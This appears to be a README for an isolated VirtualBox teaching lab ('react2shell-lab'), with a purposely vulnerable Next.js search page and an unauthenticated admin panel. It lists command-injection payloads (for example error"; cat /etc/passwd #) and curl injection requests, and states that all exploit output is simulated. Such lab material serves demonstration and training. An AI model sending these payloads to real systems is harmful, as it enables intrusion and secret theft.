Presentation demo environment — isolated VirtualBox lab only. All "exploit" output is simulated. No real shell commands execute.
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs
node -v # should show v20.x# Copy this folder to VM1, then:
cd react2shell-lab
npm install
npm run devApp will be available at: http://192.168.56.10:3000
Edit /etc/netplan/00-installer-config.yaml:
network:
version: 2
ethernets:
enp0s3:
addresses: [192.168.56.10/24]Then apply: sudo netplan apply
| URL | Purpose |
|---|---|
/ |
Login page (demo credentials shown) |
/dashboard |
SaaS dashboard — pipelines, metrics |
/search |
Vulnerable log search (main demo) |
/admin |
Exposed admin panel (no auth) |
# Scan target
nmap -sV 192.168.56.10
# View page source — find Next-Action header
curl -s http://192.168.56.10:3000/search | grep -i "next"- Set Kali browser proxy →
127.0.0.1:8080 - Visit
http://192.168.56.10:3000/search - Submit a search, intercept in Burp
- Show the
Next-Action: <hash>header
# Normal search
curl -X POST http://192.168.56.10:3000/search \
-H "Next-Action: <action-id>" \
-F "query=error"
# Injection payload (returns simulated RCE output)
curl -X POST http://192.168.56.10:3000/search \
-H "Next-Action: <action-id>" \
-F 'query=error"; id #'curl http://192.168.56.10:3000/admin
# Shows: DB passwords, API keys, JWT secrets, user hashesShow the fixed version — input validation + auth middleware.
Use the Demo Payloads panel on the /search page:
| Payload | Simulated Output |
|---|---|
error |
Normal log results |
error"; id # |
uid=33(www-data)... |
error"; whoami # |
www-data |
error"; ls / # |
Filesystem listing |
error"; env # |
ENV vars with secrets |
error"; cat /etc/passwd # |
/etc/passwd dump |
error"; uname -a # |
Kernel info |
error"; ps aux # |
Running processes |
VM1 (Target) VM2 (Kali Attacker)
192.168.56.10 ←→ 192.168.56.11
Ubuntu 22.04 Kali Linux
Next.js :3000 Burp Suite / curl
Both VMs: VirtualBox → Settings → Network → Host-Only Adapter → vboxnet0